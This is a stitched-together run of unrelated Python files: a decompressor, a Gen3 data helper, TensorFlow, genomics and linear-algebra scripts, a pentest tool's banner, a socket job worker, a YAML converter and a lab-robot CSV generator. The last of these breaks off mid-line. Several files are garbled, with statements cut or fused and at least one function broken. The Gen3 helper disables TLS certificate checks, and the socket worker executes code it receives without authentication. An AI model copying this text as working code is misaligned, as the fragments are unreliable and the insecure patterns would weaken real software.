append(self, x): if self.__full__: self.__data__.popleft() self.__data__.append(x) if self.size() == self.__max__: self.__full__ = True def get(self): return self.__data__ def size(self): return len(self.__data__) def maxsize(self): return self.__max__ def __getitem__(self, n): if n >= self.size(): return None return self.__data__[n] def LZSDecompress(data, window=RingList(2048)): reader = BitReader(data) result = '' while True: bit = reader.getBit() if not bit: char = reader.getByte() result += chr(char) window.append(char) else: bit = reader.getBit() if bit: offset = reader.getBits(7) if offset == 0: # EOF break else: offset = reader.getBits(11) lenField = reader.getBits(2) if lenField < 3: length = lenField + 2 else: lenField <<= 2 lenField += reader.getBits(2) if lenField < 15: length = (lenField & 0x0f) + 5 else: lenCounter = 0 lenField = reader.getBits(4) while lenField == 15: lenField = reader.getBits(4) lenCounter += 1 length = 15 * lenCounter + 8 + lenField for i in range(length): char = window[-offset] result += chr(char) window.append(char) return result, window class StringTools: @staticmethod def extract_strings(binary_data): strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", binary_data) return strings @staticmethod def xor_string(string): result = "" for c in string: result += chr(ord(c) ^ len(string)) return result @staticmethod def base64_string(string): base64.b64encode(string.encode()) return string.decode() @staticmethod def random_string(length=16, alphabet=string.ascii_letters + string.digits): return "".join(random.choice(alphabet) for _ in range(length)) @staticmethod def lzs_decompress(data, window=RingList(2048)): result, window = LZSDecompress(data, window) return result
# type: ignore from .batchrequest import * from .scraperequest import *
"""Utility, helps with gen3.""" import os import urllib3 import requests import sys import json from gen3.auth import Gen3Auth from gen3.submission import Gen3Submission from gen3_etl.utils.collections import grouper import logging import hashlib import multiprocessing as mp from requests.packages.urllib3.exceptions import InsecureRequestWarning urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) os.environ['CURL_CA_BUNDLE'] = '' logger = logging.getLogger('utils.gen3') DEFAULT_CREDENTIALS_PATH = os.path.join('config', 'credentials.json') DEFAULT_HOST = 'localhost' DEFAULT_ENDPOINT = 'https://{}'.format(DEFAULT_HOST) def submission_client(endpoint=DEFAULT_ENDPOINT, refresh_file=DEFAULT_CREDENTIALS_PATH): """Create authorized client.""" auth = Gen3Auth(endpoint, refresh_file=refresh_file) assert auth, 'should return an auth client' submission_client = Gen3Submission(endpoint, auth) assert submission_client, 'should return a submission client' assert 'delete_program' in dir(submission_client), 'should have a delete_program method' assert 'create_program' in dir(submission_client), 'should have a create_program method' return submission_client def create_node(submission_client, program_name, project_code, node): """Create node(s).""" try: nodes = node if not isinstance(node, (list,)): nodes = [node] response_text = None response = None response = submission_client.submit_record(program_name, project_code, nodes) # response = json.loads(response_text) #"create_node: status_code:{response['code']}") assert response['code'] == 200, 'could not create {} {}'.format(nodes[0]['type'], response_text)'created {} {}(s)'.format(len(response['entities']), response['entities'][0]['type'])) return response except Exception as e: logger.error(f"create_node: error {e}") logger.error(f"create_node: error {response_text} {nodes}") if response: for entity in response.get('entities', []): for error in entity.get('errors', []): logger.error('{} {} {}'.format(error['type'], entity['type'], entity)) for error in response.get('transactional_errors', []): logger.error(' transactional_error {}'.format(error)) logger.error(json.dumps(response)) raise e # if error['type'] == 'INVALID_LINK': # print('WARNING INVALID_LINK {} {}'.format(entity['type'],entity), file=sys.stderr) # else: # print('ERROR {} {} {}'.format(error['type'], entity['type'],entity), file=sys.stderr) # raise e def delete_type(submission_client, program, project, batch_size, t): response = submission_client.export_node(program, project, node_type=t, fileformat='json') # # pool = mp.Pool(mp.cpu_count()) def collect_result(delete_response): delete_response = delete_response.json() assert delete_response['code'] == 200, delete_response'deleted {} {}'.format(t, delete_response['message'])) if 'data' not in response or len(response['data']) == 0: logger.warning(f'No {t} to delete {response}') else: for ids in grouper(batch_size, [n['node_id'] for n in response['data']]):'deleting {len(ids)}') ids = ','.join(ids) collect_result(submission_client.delete_record(program, project, ids)) # # pool.apply_async(submission_client.delete_record, args=(program, project, ids), callback=collect_result) # Close Pool and let all the processes complete # postpones the execution of next line of code until all processes in the queue are done # # pool.close() # # pool.join() def delete_all(submission_client, program, project, batch_size=200, types=['submitted_methylation', 'aliquot', 'sample', 'demographic', 'case', 'experiment']): """Delete all nodes in types hierarchy.""" for t in types: print('{}-{}.{}'.format(program, project, t)) try: delete_type(submission_client, program, project, batch_size, t) except Exception as e: print(e) def create_experiment(submission_client, program, project, submitter_id): """Create experiment.""" experiment = { '*projects': {'code': project}, '*submitter_id': submitter_id, 'type': 'experiment' } return create_node(submission_client, program, project, experiment) # def get_class_tablename_from_id(_id): return 'node_{}'.format(_id.replace('_', '')) # def generate_edge_tablename(src_label, label, dst_label): """Generate a name for the edge table. Because of the limit on table name length on PostgreSQL, we have to truncate some of the longer names. To do this we concatenate the first 2 characters of each word in each of the input arguments up to 10 characters (per argument). However, this strategy would very likely lead to collisions in naming. Therefore, we take the first 8 characters of a hash of the full, un-truncated name *before* we truncate and prepend this to the truncation. This gets us a name like ``edge_721d393f_LaLeSeqDaFrLaLeSeBu``. This is rather an undesirable workaround. - jsm """ tablename = 'edge_{}{}{}'.format( src_label.replace('_', ''), label.replace('_', ''), dst_label.replace('_', ''), ) # If the name is too long, prepend it with the first 8 hex of it's hash # truncate the each part of the name if len(tablename) > 40: oldname = tablename logger.debug('Edge tablename {} too long, shortening'.format(oldname)) tablename = 'edge_{}_{}'.format( str(hashlib.md5(tablename.encode('utf-8')).hexdigest())[:8], "{}{}{}".format( ''.join([a[:2] for a in src_label.split('_')])[:10], ''.join([a[:2] for a in label.split('_')])[:7], ''.join([a[:2] for a in dst_label.split('_')])[:10], ) ) logger.debug('Shortening {} -> {}'.format(oldname, tablename)) return tablename
<reponame>huent189/crnn from __future__ import print_function from __future__ import division import numpy as np import tensorflow as tf import codecs def testCustomOp(feedMat, corpus, chars, wordChars): "decode using word beam search. Result is tuple, first entry is label string, second entry is char string." # TF session sess=tf.Session() # load custom TF op word_beam_search_module = tf.load_op_library('../cpp/proj/') # input with shape TxBxC mat=tf.placeholder(tf.float32, shape=feedMat.shape) # decode using the "Words" mode of word beam search with beam width set to 25 and add-k smoothing to 0.0 assert(len(chars)+1==mat.shape[2]) decode=word_beam_search_module.word_beam_search(mat, 25, 'Words', 0.0, corpus.encode('utf8'), chars.encode('utf8'), wordChars.encode('utf8')) # feed matrix of shape TxBxC and evaluate TF graph, { mat:feedMat }) # result is string of labels terminated by blank (similar to C-strings) if shorter than T blank=len(chars) s='' for label in res[0]: if label==blank: break s+=chars[label] # map label to char return (res[0], s) def loadMat(fn): "load matrix from csv and apply softmax" mat=np.genfromtxt(fn, delimiter=';')[:,:-1] #load matrix from file maxT,_=mat.shape # dim0=t, dim1=c # apply softmax res=np.zeros(mat.shape) for t in range(maxT): y=mat[t,:] e=np.exp(y) s=np.sum(e) res[t,:]=e/s # expand to TxBxC return np.expand_dims(res,1) def testMiniExample(): "mini example, just to check that everything is working" corpus='a ba' # two words "a" and "ba", separated by whitespace chars='ab ' # the first three characters which occur in the matrix (in this ordering) wordChars='ab' # whitespace not included which serves as word-separating character mat=np.array([[[0.9, 0.1, 0.0, 0.0]],[[0.0, 0.0, 0.0, 1.0]],[[0.6, 0.4, 0.0, 0.0]]]) # 3 time-steps and 4 characters per time time ("a", "b", " ", blank) res=testCustomOp(mat, corpus, chars, wordChars) print('') print('Mini example:') print('Label string: ',res[0]) print('Char string:', '"'+res[1]+'"') def testRealExample(): "real example using a sample from a HTR dataset" dataPath='../data/bentham/''corpus.txt', 'r', 'utf8').read()'chars.txt', 'r', 'utf8').read()'wordChars.txt', 'r', 'utf8').read() mat=loadMat(dataPath+'mat_2.csv') res=testCustomOp(mat, corpus, chars, wordChars) print('') print('Real example:') print('Label string: ',res[0]) print('Char string:', '"'+res[1]+'"') if __name__=='__main__': # test custom op testMiniExample() testRealExample()
import EmailParser.pst_parser """ if __name__ == "__main__": pass else: from EmailBoxClass import EmailBox EmailBox.main = EmailParser.pst_parser.main """
''' ''' ############################################################################ from optparse import OptionParser import sys import re import numpy as np import os import sys import gzip from subprocess import check_call def parse_options(): parser = OptionParser() parser.add_option("-f", "--compressed_bin_file", dest="compressed_bin_file", help="Compressed bin file", metavar="BFILE") parser.add_option("-c", "--chromosome", dest="chromosome", help="Chromosome of compressed bin file", metavar="CHR") parser.add_option("-s", "--synteny_file", dest="synteny_file", help="Synteny file", metavar="SFILE") parser.add_option("-o", "--out_folder", dest="out_folder", help="Folder output files", metavar="OUTFOLDER") parser.add_option("-r", "--ref_species", dest="ref_species", help="Reference species designation within synteny file", metavar="REF") parser.add_option("-t", "--target_species", dest="target_species", help="Target species (matches compressed bin data) designation within synteny file", metavar="TARGET") parser.add_option("-w", "--width", dest="width", help="Optional: width in bins of compressed bin data", default=3500, metavar="TARGET") parser.add_option("-b", "--bin_size", dest="bin_size", help="Optional: size of bins in bp", default=500, metavar="BINSIZE") (options, args) = parser.parse_args() return options def parse_synteny_file(file, ref_sp, target_sp): target = [] ref = [] with open(file, 'r') as f: for line in f: line = line.rstrip() if (len(line) == 0): pass elif (line[0] == '#'): pass elif(line[0] == '>'): pass else: (species, remain) = line.split('.') (remain, strand) = remain.split(' ') (chr_, remain) = remain.split(':') (loc1, loc2) = remain.split('-') chr_ = re.sub('chr', '', chr_) if (species == ref_sp): ref.append(chr_ + '-' + loc1 + '-' + loc2) elif(species == target_sp): target.append([chr_, loc1, loc2, strand]) return ref, target def read_compressed_bin(file, width): init_max_size = int(1e6) bin_counts = np.zeros(init_max_size) bin_bin_counts = np.zeros((init_max_size, init_max_size)) max_bin = 0 if (file[-2:] == 'gz'): f =, 'rt') else: f = open(file, 'r') for line in f: line = line.rstrip() if (line[0] == '#'): chr_, bin_, count = line[1:].split('\t') bin_ = int(bin_) count = float(count) bin_counts[bin_] = count if (bin_ > max_bin): max_bin = bin_ else: chr_, bin1, bin2, count = line.split('\t') bin1 = int(bin1) bin2 = int(bin2) count = float(count) bin_bin_counts[bin1][bin2] = count f.close() print('Done reading' + file) return bin_counts, bin_bin_counts, max_bin options = parse_options() compressed_bin_file = options.compressed_bin_file synteny_file = options.synteny_file out_folder = options.out_folder ref_species = options.ref_species target_species = options.target_species width = int(options.width) chromosome = options.chromosome bin_size = int(options.bin_size) synteny_ref, synteny_target = parse_synteny_file(synteny_file, ref_species, target_species) bin_counts, bin_bin_counts, max_bin = read_compressed_bin(compressed_bin_file, width) for i in range(0, len(synteny_ref)): ref_name = synteny_ref[i] chr_, loc1, loc2, strand = synteny_target[i] if (chr_ == chromosome): bin1 = int(int(loc1) / bin_size) bin2 = int(int(loc2) / bin_size) outfile = os.path.join(out_folder, ref_name + '.txt') with open(outfile, 'w') as out: sub_bin_counts = bin_counts[bin1:bin2] sub_bin_bin_counts = bin_bin_counts[bin1:bin2, bin1:bin2] # Flip if negative strand if (strand == '-'): sub_bin_counts = sub_bin_counts[::-1] sub_bin_bin_counts = sub_bin_bin_counts[::-1, ::-1] for j in range(0, len(sub_bin_counts)): count = sub_bin_counts[j] if (count > 0): out.write('#' + chromosome + '\t' + str(j) + '\t' + str(count) + '\n') for j in range(0, len(sub_bin_counts)): left = np.max((0, j - width)) right = np.min((j + width, len(sub_bin_counts))) for k in range(left, right): count = sub_bin_bin_counts[j,k] if (count > 0): out.write(chromosome + '\t' + str(j) + '\t' + str(k) + '\t'+ str(count) + '\n') check_call(['gzip', outfile])
<reponame>EtcAug10/Domaineer #!/usr/bin/env python3 """ Copyright (C) 2021 Semi-Auto bot tool made by c0del1ar a.k.a <NAME> and it is licensed """ class Color: gray = "\033[30;1m" red = "\033[31;1m" green = "\033[32;1m" yellow = "\033[33;1m" blue = "\033[34;1m" pink = "\033[35;1m" cyan = "\033[36;1m" white = "\033[37;1m" default = "\033[37;0m" _version_ = "" _author_ = "c0del1ar" _name_ = "Domaineer" banner = [""" {}## ### ## {}##### {}Domaineer ## {}# ### {}by c0del1ar | ## {}# ##### {}Version {}{} | ### {}##{} | ####### {}##{} This FREE tool is | {}##{} Licensed | {}############{} ________/_____/___/__/{} """.format(,Color.gray,,Color.gray,,Color.gray,Color.white,_version_,,Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.default), """ {}########### ############# ### ### ### ### {}Domain Engineer {}### {}##{} ## {}by c0del1ar ## {}### {}## {}# {}## {}### {}## {}## {}## {}## {}## {}### {}v{} {}## ## {}### {}## {}######### {}# {}#################### {}## #########################{} """.format(Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.gray,,Color.gray,Color.white,_version_,,Color.gray,,Color.gray,,Color.gray,,Color.default)] prefix = "\u2699" about = ["Domain Engineer or called as Domaineer is a tool to extract or dump any datas of domains in hole net lines.\n\nWhen you use this tool, It means you are accepting all of the Terms and Conditions in Ethical Hacker's guide book. Hope you've read it.","This bot helps you in doing penetration testing, learning the ins and outs of domains, analyzing objects, even doing stupid things like hacking your own domain and showing it off in front of your friends.","A wide variety of hacking tools are here, use them with great care. Don't worry, there is no backdoor logger here. The bot will continue to be updated if bugs and changes are found to improve the quality of the bot and update exploits"] tool_choices = ["Grab Sites","Reverse IP","CMS Scanner","Google SE","DFuzzer","Domain to IP"]
from numpy import matrix from numpy import shape from numpy import transpose from laff.matmat.trsm_lnu import trsm_lnu from laff.matmat.trsm_utn import trsm_utn from laff.matmat.trsm_ltu import trsm_ltu from laff.matmat.trsm_unn import trsm_unn import sys def trsm(uplo, trans, diag, A, B ): """ Solve A X = B or trans( A X ) = trans( B ), overwriting B with X Parameter uplo indicates whether to use the lower triangular or upper triangular part of A: if uplo == 'Lower triangular': A is lower triangular elif upl == 'Upper triangular': A is upper trianglar Parameter trans indicates whether to transpose A: if trans == 'No transpose': solve A X = B elif trans == 'Transpose': solve trans( A X ) = trans( B ) Parameter diag indicates whether A has an (implicit) unit diagonal: if diag == 'Unit diagonal': A has an implicit unit diagonal elif diag == 'Nonunit diagonal': Use the entries on the diagonal of A """ """ Check parameters """ assert (uplo == 'Lower triangular' or uplo == 'Upper triangular'), "laff.trsv: illegal value for uplo" assert (trans == 'No transpose' or trans == 'Transpose'), "laff.trsv: illegal value for trans" assert (diag == 'Nonunit diagonal' or diag == 'Unit diagonal'), "laff.trsv: illegal value for diag" assert type(A) is matrix and len(A.shape) is 2, \ "laff.trsv: matrix A must be a 2D numpy.matrix" assert type(B) is matrix and len(B.shape) is 2, \ "laff.trsvv: matrix B must be a 2D numpy.matrix" """ Extract sizes """ m_A, n_A = A.shape m_B, n_B = B.shape if 'Lower triangular' == uplo: if 'No transpose' == trans: if 'Unit diagonal' == diag: trsm_lnu( A, B ) else: print( "laff.trsm: diag == Nonunit diagonal not yet implemented for Lower triangular" ) sys.exit( 0 ) else: if 'Unit diagonal' == diag: trsm_ltu( A, B ) else: print( "laff.trsm: trans == Transpose not yet implemented for Lower triangular, nonunit diagonal" ) sys.exit( 0 ) else: #'Upper triangular' == uplo if 'No transpose' == trans: if 'Unit diagonal' == diag: print( "laff.trsm: trans == No transpose not yet implemented for Upper triangular, unit diagonal" ) sys.exit( 0 ) else: trsm_unn( A, B ) else: if 'Unit diagonal' == diag: print( "laff.trsm: diag == Unit diagonal not yet implemented for Upper triangular" ) sys.exit( 0 ) else: trsm_utn( A, B )
<gh_stars>0 #!/usr/bin/env python3 #coding=utf-8 class AscertainmentBias(object): """Mixin to test for Ascertainment Bias""" def test_ascertainment_character(self): sequences = self.xml.findall('./data/sequence') p = './/distribution[@id="likelihood"]/distribution/data/data' for part in self.xml.findall(p): try: site = int(part.get('filter').split("-")[0]) except: print("Invalid filter %r for %s" % (part.get('filter'), part.get('id'))) raise for seq in sequences: site_zero = seq.get('value')[0] if site_zero not in ('0', '?', '-'): raise AssertionError( "Expected site zero to be 0/?/- for ascertainment" ) def test_treeLikelihood_corrects_for_ascertainment(self): p = './/distribution[@id="likelihood"]/distribution/data' for data in self.xml.findall(p): assert data.get('ascertained') == 'true' def test_treeLikelihood_has_exclude_set_correctly(self): p = './/distribution[@id="likelihood"]/distribution/data' for data in self.xml.findall(p): # not inclusive assert data.get('excludeto') == '1', "%s does not have exclude set to 1" % data.get('id')
<reponame>8Banana/dotfiles import os import pathlib import shutil import stat import sys import time import types from enum import Enum, auto import importlib.util import socket import json from multicomputering import Packer class WorkerStates(Enum): Listening = auto() Connecting = auto() PreparingWork = auto() Working = auto() class ComputerWorker: _GUID_SEP = '0x27177c1797dc03ee853922f411bdf83f55e9ed2dcd953a4369f9b1a454e60fa0'.encode('utf-8') def __init__(self, sock): self.state = WorkerStates.Listening self.sock = sock self.workspace = {} self._loc = None self._packages_loc = None self.results = {} def ready_filesys(self, loc): self._loc = os.path.dirname(os.path.abspath(__file__)) self._packages_loc = os.path.join( self._loc, '..', '.multicomputering_packages_' + str(id(self))) sys.path.append(loc or self._packages_loc) pathlib.Path(self._packages_loc).mkdir(parents=True, exist_ok=True) def clean_up_filesys(self): shutil.rmtree(self._packages_loc, onerror=self.remove_readonly) def start(self, loc=None): self.ready_filesys(loc) print('doing task :)') self.recv_init() self.recv_code() self.recv_data() self.wait_for_pulse() print('Done!') self.clean_up_filesys() self.disconnect() def recv_init(self): pass def recv_code(self, *args): data = self.recv() data = json.loads(data.decode('utf-8')) for module_name, contents in data.items(): Packer.write_package(self._packages_loc, module_name, contents) self.workspace[module_name] = contents self.pulse() def recv_data(self, *args): data = self.recv() data = json.loads(data.decode('utf-8')) Packer.write_data( self._packages_loc, '_remote_data', data) self.pulse() def reflect(self): pass def clear_callables(self): pass def run(self): py_obj = importlib.util.spec_from_file_location( 'main', os.path.join( self._packages_loc, 'main' + '.py')) module = importlib.util.module_from_spec(py_obj) py_obj.loader.exec_module(module) result = module.main() self.send(result.encode('utf-8')) def disconnect(self): self.sock.close() raise SystemExit(0) def send(self, *args, **kwargs): self.sock.sendall(*args, **kwargs) def recv(self): buffer = bytearray() while True: buffer += self.sock.recv(4096) if len(buffer) >= 64: bytes_target = int.from_bytes(buffer[:64], 'big') buffer = buffer[64:] break while len(buffer) != bytes_target: buffer += self.sock.recv(4096) return buffer def pulse(self): self.send(b'wololoo') def wait_for_pulse(self): p = self.recv() assert(p == b'wololoo') @staticmethod def remove_readonly(func, path, _): print(path) "Clear the readonly bit and reattempt the removal" os.chmod(path, stat.S_IWRITE) func(path) def handler(sock, addr): pc = ComputerWorker(sock) try: pc.start() except KeyboardInterrupt as e: pc.clean_up_filesys() raise e def main(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('localhost', int(sys.argv[1]))) sock.listen(5) while True: (clientsock, address) = sock.accept() print("Got client!", address) handler(clientsock, address) if __name__ == '__main__': main()
from pymoo.factory import get_problem, get_reference_directions, get_visualization from pymoo.util.plotting import plot x = [0.040971105531507235,0.550373235584878,0.6817311625009819,0.6274478938025135,0.9234111071427142,0.02499901960750534,0.136171616578574,0.9084459589232222,0.21089363254881652,0.08574450529306678,0.20551052286248087,0.43442188671029464] n_var = len(x) n_obj = 3 problems = ["dtlz1", "dtlz2", "dtlz3", "dtlz4", "dtlz5", "dtlz6", "dtlz7"] for problem in problems: p = get_problem(problem, n_var, n_obj) r = p.evaluate(x) print(r) # PYMOO # [ 9.86928923 8.06270417 419.74214702] # [1.35981478 1.59402999 0.13503034] # [566.92680262 664.57456923 56.29613817] # [2.09958592e+000 3.83693240e-026 5.83474399e-139] # [1.41890847 1.54166358 0.13503034] # [6.42107287 7.40537588 0.63167125] # [ 0.04097111 0.55037324 17.32742807] # GOLANG # [9.869289225575503 8.062704169938133 419.74214702336616] # [1.3598147826944689 1.5940299863405385 0.13503034348631712] # [566.9268026207471 664.5745692269643 56.296138168016384] # [2.0995859197111355 3.8369323955770535e-26 5.834743988703213e-139] # [1.4189084710787399 1.5416635791534465 0.13503034348631712] # [6.421072865759349 7.405375882273675 0.6316712455606305] # [0.040971105531507235 0.550373235584878 17.32742807181844]
# Convert a Rogue Python file into a CPSW YAML file import os from collections import OrderedDict import yaml import pyrogue as pr from version import CPSW_YAML_SCHEMA_VERSION class YamlConverter: """ Convert a rogue Python device object into CPSW YAML, and write the YAML into a file. """ # Default values as required by the CPSW YAML specs MMIO_DEVICE_CLASS = "MMIODev" CONFIG_PRIO_VALUE = 1 ROOT_DEVICE_SIZE = 8 SEQUENCE_COMMAND_OFFSET = 0 CHILD_DEVICE_CLASS = "IntField" SEQUENCE_COMMAND_CLASS = "SequenceCommand" CHILD_DEVICE_BYTE_ORDER = "BE" def __init__(self, pyrogue_device): """ Initialize the Converter. Parameters ---------- pyrogue_device : Device The Rogue device object, from which its CPSW YAML representation is to be formed. """ self._pyrogue_device = pyrogue_device self._serialized_data = OrderedDict() def convert(self, export_filename, export_dirname="output"): """ Perform the conversion, i.e. dumping the Rogue device object's data into a YAML-formatted file. The output file will be saved into the output/ directory, which is under the working directory. Parameters ---------- export_filename : str The name of the output file export_dirname : str The name of the output directory """ self._serialize_rogue_data() self._export_to_yaml(export_filename, export_dirname) def _serialize_rogue_data(self): """ Serialize the Rogue device object. """ self._serialized_data = OrderedDict() if hasattr(self._pyrogue_device, "name"): name = self._serialized_data[name] = ''.join(['&', name]) self._serialized_data["__root__"] = OrderedDict() if hasattr(self._pyrogue_device, "description"): self._serialized_data["__root__"]["description"] = self._pyrogue_device.description self._serialized_data["__root__"]["configPrio"] = YamlConverter.CONFIG_PRIO_VALUE self._serialized_data["__root__"]["class"] = YamlConverter.MMIO_DEVICE_CLASS self._serialized_data["__root__"]["size"] = hex(YamlConverter.ROOT_DEVICE_SIZE) replica_count = 0 if hasattr(self._pyrogue_device, "_numBuffers"): replica_count = self._pyrogue_device._numBuffers if replica_count: self._serialized_data["__root__"]["metadata"] = OrderedDict() self._serialized_data["__root__"]["metadata"]["numBuffers"] = ' '.join(['&numBuffers', str(replica_count)]) self._serialized_data["__root__"]["children"] = OrderedDict() self._serialize_children(self._pyrogue_device, replica_count) def _serialize_children(self, device, replica_count): """ Serialize the Rogue device's children, i.e. remote variables and commands. Potentially recursive (if needed) if a remote variable can contain children. Parameters ---------- device : pr.Device A Rogue device whose children are to be serialized """ # Serialize Remote Variables if hasattr(device, "getNodes"): remote_variables = device.getNodes(pr.RemoteVariable) self._serialize_remote_variables(remote_variables, replica_count) # Serialize devices if hasattr(device, "devices"): devices = device.devices self._serialize_devices(devices) # Serialize Commands if hasattr(device, "commands"): commands = device.commands self._serialize_commands(commands) def _serialize_remote_variables(self, remote_variables, replica_count): """ Serialize just the remote variables. Parameters ---------- remote_variables : OrderedDict An ordered dictionary of remote variables for a Rogue device. """ if remote_variables and len(remote_variables): for key, remote_var in remote_variables.items(): remote_var_name = search_index = remote_var_name.find('[') if search_index >= 0: remote_var_name = remote_var_name[0:search_index] if key[search_index:search_index + 3] != "[0]" and not replica_count: current_node_count = child_data[remote_var_name].get("nelms", None) if current_node_count is None: self._serialized_data["__root__"]["children"][remote_var_name]["at"]["nelms"] = 2 else: self._serialized_data["__root__"]["children"][remote_var_name]["at"]["nelms"] = \ current_node_count + 1 continue child_data = OrderedDict() child_data['#'] = '#' * 20 child_data[remote_var_name] = OrderedDict() child_data[remote_var_name]["at"] = OrderedDict() child_data[remote_var_name]["at"]["offset"] = hex(remote_var.offset) if replica_count: child_data[remote_var_name]["at"]["nelms"] = "*numBuffers" child_data[remote_var_name]["at"]["byteOrder"] = YamlConverter.CHILD_DEVICE_BYTE_ORDER child_data[remote_var_name]["description"] = remote_var.description child_data[remote_var_name]["class"] = YamlConverter.CHILD_DEVICE_CLASS child_data[remote_var_name]["sizeBits"] = remote_var.varBytes * 8 # Must adjust so that the value falls within the CPSW range -- [0..7] ls_bit = remote_var.bitOffset[-1] if remote_var.bitOffset[-1] < 8 else remote_var.bitOffset[-1] % 8 if ls_bit: # Since the default value is 0, only output if the ls_bit value is larger than 0 child_data[remote_var_name]["lsBit"] = ls_bit child_data[remote_var_name]["mode"] = remote_var.mode child_data[remote_var_name]['##'] = '#' * 20 self._serialized_data["__root__"]["children"].update(child_data) def _serialize_devices(self, devices): """ Serialize the child devices. Parameters ---------- devices : OrderedDict The child device record. """ if devices and len(devices): for key, v in devices.items(): device_name = key search_index = device_name.find('[') if search_index >= 0: device_name = device_name[0:search_index] if key[search_index:search_index + 3] != "[0]": # Do not output duplicate remote var names with different subscripts current_node_count = child_data[device_name].get("nelms", None) if current_node_count is None: self._serialized_data["__root__"]["children"][device_name]["at"]["nelms"] = 2 else: self._serialized_data["__root__"]["children"][device_name]["at"]["nelms"] = \ current_node_count + 1 continue child_data = OrderedDict() child_data['#'] = '#' * 20 child_data[device_name] = OrderedDict() child_data[device_name]["<<"] = ''.join(['*', device_name]) child_data[device_name]["at"] = OrderedDict() if hasattr(devices[key], "offset"): child_data[device_name]["at"]["offset"] = hex(devices[key].offset) child_data[device_name]['##'] = '#' * 20 self._serialized_data["__root__"]["children"].update(child_data) def _serialize_commands(self, commands): """ Serialize just the commands. Parameters ---------- commands : OrderedDict An ordered dictionary of commands for a Rogue device. """ if commands and len(commands): for _, command in commands.items(): command_name = child_data = OrderedDict() child_data['#'] = '#' * 20 child_data[command_name] = OrderedDict() child_data[command_name]["at"] = OrderedDict() child_data[command_name]["at"]["offset"] = hex(command.offset) if hasattr(command, "offset") else \ hex(YamlConverter.SEQUENCE_COMMAND_OFFSET) child_data[command_name]["name"] = command_name child_data[command_name]["description"] = command.description child_data[command_name]["class"] = YamlConverter.SEQUENCE_COMMAND_CLASS child_data[command_name]['##'] = '#' * 20 self._serialized_data["__root__"]["children"].update(child_data) def _export_to_yaml(self, filename, dirname="output"): """ Post-process the YAML contents before writing into the final output file. This is accomplished by first writing into a temporary file, then read the temporary file and process certain lines, i.e. adding headers, then write to the official output line. Finally, automatically delete the temporary line. Parameters ---------- filename : str The user-provided output data file name. dirname : str The name of the output directory """ with open(os.path.join(dirname, '.'.join([filename, "tmp"])), 'w') as temp_yaml_file: contents = YamlConverter.ordered_dump(self._serialized_data, dumper=yaml.SafeDumper, default_flow_style=False) contents = contents.replace("__root__:\n", "") temp_yaml_file.write(contents) with open(os.path.join(dirname, filename), 'w') as yaml_file: YamlConverter._insert_heading(yaml_file, filename) with open(os.path.join(dirname, '.'.join([filename, "tmp"])), 'r') as temp_yaml_file: lines = temp_yaml_file.readlines() for line in lines: line = YamlConverter._post_process_line(line) yaml_file.write(line) os.remove(os.path.join(dirname, '.'.join([filename, "tmp"]))) @staticmethod def _post_process_line(line): """ Decorate an output line. Parameters ---------- line : str An output line to be decorated. Returns : str ------- The decorated output line """ # Add headers to separate sections in the YAML file if any(keyword in line for keyword in ("children:", "\'#\'", "\'##\'")): space_count = len(line) - len(line.lstrip()) if "children:" in line: markings = ''.join([' ' * space_count, '#' * 10, '\n']) line = markings + line + markings elif "\'#\'" in line: line = ''.join([' ' * space_count, '#' * 80, '\n']) elif "\'##'" in line: space_count -= 2 line = ''.join([' ' * space_count, '#' * 80, '\n']) elif "\'" in line: # Remove single quotes surrounding strings as they're not in the CPSW YAML specs line = line.replace("\'", '') return line @staticmethod def _insert_heading(yaml_file, filename): yaml_file.write("##############################################################################\n") yaml_file.write("## This file is part of 'SLAC Firmware Standard Library'.\n") yaml_file.write("## It is subject to the license terms in the LICENSE.txt file found in the \n") yaml_file.write("## top-level directory of this distribution and at: \n") yaml_file.write("## \n") yaml_file.write("## No part of 'SLAC Firmware Standard Library', including this file, \n") yaml_file.write("## may be copied, modified, propagated, or distributed except according to \n") yaml_file.write("## the terms contained in the LICENSE.txt file. \n") yaml_file.write("############################################################################## \n") yaml_file.write(' '.join(["#schemaversion", CPSW_YAML_SCHEMA_VERSION, '\n'])) yaml_file.write(' '.join(["#once", filename, '\n\n\n'])) @staticmethod def ordered_dump(data, stream=None, dumper=yaml.Dumper, **kwds): """ Overriding PyYAML generation to support OrderedDict. Reference: Parameters ---------- data : OrderedDict The ordered data structure stream : stream In this context, the file to dump the YAML contents dumper : yaml.Dumper The YAML dumping object kwds : args Additional arguments as supported by PyYAML. Returns : str ------- A string containing the entire YAML contents. """ class OrderedDumper(dumper): pass def _dict_representer(dumper, data): return dumper.represent_mapping( yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, data.items()) OrderedDumper.add_representer(OrderedDict, _dict_representer) return yaml.dump(data, stream, OrderedDumper, **kwds)
#!/usr/bin/env python import re import sys from EPPs.common import GenerateHamiltonInputEPP, InvalidStepError class GenerateHamiltonInputSeqQuantPlate(GenerateHamiltonInputEPP): """"Generate a CSV containing the necessary information for preparing the spectramax picogreen plate. The standards locaiton is not stored in the LIMS and will be hard-coded into the Hamilton method""" _use_load_config = False # prevent the loading of the config # Define the column headers that will be used in the Hamilton input file csv_column_headers = ['Sample ID', 'Source Plate BC', 'Source Plate Position', 'Sample Volume (ul)', 'Destination Plate BC', 'Destination Plate Position', 'Master Mix Volume (ul)'] # Define the output file output_file_name = 'SEQ_PLATE_QUANT.csv' # Define the number of input containers that are permitted _max_nb_input_containers = 1 # Define the number of output containers that are permitted _max_nb_output_containers = 1 # the step requires 3 output replicates per input _nb_resfiles_per_input = 3 def _generate_csv_dict(self): # build a dictionary of the csv lines with the output well as the key so can be populated into the output file in the best order for straightforward import into the Hamilton method # in a pattern for most efficient pipetting i.e. columns then rows csv_dict = {} # find the corresponding lot number i.e. barcode for the SDNA plate. sdna_template = "LP[0-9]{7}-SDNA" sdna_barcode = "" reagent_lots = list(self.process.step.reagent_lots) for lot in reagent_lots: if re.match(sdna_template, lot.lot_number): sdna_barcode = lot.lot_number if not sdna_barcode: raise InvalidStepError( 'SDNA Plate lot not selected. Please select in "Reagent Lot Tracking" at top of step.') # find all the inputs for the step that are analytes (i.e. samples and not associated files) for art in self.artifacts: outputs = self.process.outputs_per_input(, ResultFile=True) # 